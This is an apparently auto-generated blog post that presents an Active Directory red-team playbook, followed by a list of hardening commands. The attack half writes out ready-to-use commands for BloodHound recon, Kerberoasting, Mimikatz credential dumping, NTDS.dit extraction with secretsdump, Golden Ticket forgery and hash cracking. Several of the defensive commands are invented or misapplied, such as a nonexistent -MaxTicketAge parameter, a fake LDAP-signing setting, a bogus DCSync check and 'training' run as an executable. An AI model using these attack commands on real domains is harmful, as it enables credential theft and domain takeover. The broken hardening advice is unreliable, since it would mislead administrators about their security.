Mastering Active Directory Attacks: The Red Team Playbook 🆔

Listen to this Post

🐢▶️ Listen🚀

2025-02-15

Active Directory (AD) is the crown jewel for attackers during engagements. This comprehensive guide dives deep into techniques that every red teamer should have in their arsenal. From recon to privilege escalation, it’s all about navigating and exploiting AD’s complexity.

Key Highlights:

1️⃣ Reconnaissance with BloodHound & PowerView

Map out AD relationships and uncover attack paths using BloodHound.

<h1>Install BloodHound</h1>

sudo apt-get install bloodhound

<h1>Run BloodHound collector</h1>

bloodhound-python -d <domain> -u <username> -p <password> -c All

Enumerate users, groups, and domain policies with PowerView.

<h1>Import PowerView</h1>

Import-Module .\PowerView.ps1

<h1>Enumerate domain users</h1>

Get-NetUser

2️⃣ Privilege Escalation:

Exploit Kerberoasting and Pass-the-Hash to compromise service accounts.

<h1>Kerberoasting with Impacket</h1>

GetUserSPNs.py -request -dc-ip <DC_IP> <domain>/<user>:<password>

Abuse vulnerable Group Policy Objects (GPOs) to escalate privileges.

<h1>Enumerate GPOs</h1>

Get-NetGPO

3️⃣ Credential Dumping:

Leverage Mimikatz and DCSync attacks to extract sensitive credentials.

<h1>Mimikatz command for credential dumping</h1>

mimikatz # sekurlsa::logonpasswords

Dump NTDS.dit for domain-wide access.

<h1>Using Impacket to dump NTDS.dit</h1>

secretsdump.py -just-dc <domain>/<user>:<password>@<DC_IP>

4️⃣ Kerberos Ticket Attacks:

Deploy Golden Ticket and Silver Ticket attacks to maintain persistent access.

<h1>Golden Ticket attack with Mimikatz</h1>

mimikatz # kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt> /id:<id>

Exploit Kerberoasting to crack service account credentials offline.

<h1>Crack Kerberoasting hashes with Hashcat</h1>

hashcat -m 13100 -a 0 hashes.txt wordlist.txt

5️⃣ Misconfigurations to Exploit:

Attack poorly configured LDAP and SMB signing settings.

<h1>Check SMB signing with CrackMapExec</h1>

crackmapexec smb <target> --gen-relay-list relay.txt

Abuse Active Directory Certificate Services (AD CS) for privilege escalation.

<h1>Enumerate AD CS templates</h1>

Get-ADObject -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=<domain>,DC=com" -Filter *

Tools for Success:

• BloodHound: BloodHound GitHub
• CrackMapExec: CrackMapExec GitHub
• Mimikatz: Mimikatz GitHub
• Impacket: Impacket GitHub
• PingCastle: PingCastle Official Site

What Undercode Say

Active Directory remains a critical component in enterprise environments, and its security is paramount. The techniques outlined in this guide are essential for red teamers to understand and defend against. Here are some additional commands and practices to further enhance your AD security posture:

1. Regularly Audit AD Permissions:

<h1>Check for excessive permissions</h1>

Get-ADObject -Filter * -Properties * | Where-Object { $_.DistinguishedName -like "*OU=Admin*" }

2. Monitor for Anomalous Logins:

<h1>Check for unusual login times</h1>

Get-EventLog -LogName Security -InstanceId 4624 -After (Get-Date).AddHours(-24)

3. Implement SMB Signing:

<h1>Enable SMB signing on all devices</h1>

Set-SmbClientConfiguration -RequireSecuritySignature $true

4. Secure LDAP:

<h1>Enforce LDAPS</h1>

Set-ADObject -Identity "CN=Default Domain Policy,CN=System,DC=<domain>,DC=com" -Replace @{ldapserverintegrity=2}

5. Harden Kerberos:

<h1>Set Kerberos ticket lifetime</h1>

Set-ADDefaultDomainPasswordPolicy -MaxTicketAge 10

6. Regularly Update GPOs:

<h1>Apply security updates via GPO</h1>

gpupdate /force

7. Monitor for DCSync Attacks:

<h1>Check for DCSync permissions</h1>

Get-ADObject -Filter * -Properties * | Where-Object { $_.DistinguishedName -like "*CN=Domain Admins*" }

8. Implement Advanced Threat Protection:

<h1>Enable ATP in Windows Defender</h1>

Set-MpPreference -EnableNetworkProtection Enabled

9. Regularly Backup AD:

<h1>Backup AD database</h1>

wbadmin start backup -backuptarget:<target> -include:<AD_path>

10. Educate Your Team:

<h1>Conduct regular security training</h1>

Invoke-Command -ScriptBlock { Start-Process -FilePath "C:\Path\To\Training.exe" }

By following these practices and commands, you can significantly reduce the attack surface of your Active Directory environment. Always stay updated with the latest security patches and advisories to keep your systems secure.

For further reading, check out these resources:

• Microsoft Active Directory Security Best Practices
• BloodHound Documentation
• Impacket Usage Examples

Stay vigilant, and keep your AD secure!

References:

Hackers Feeds, Undercode AI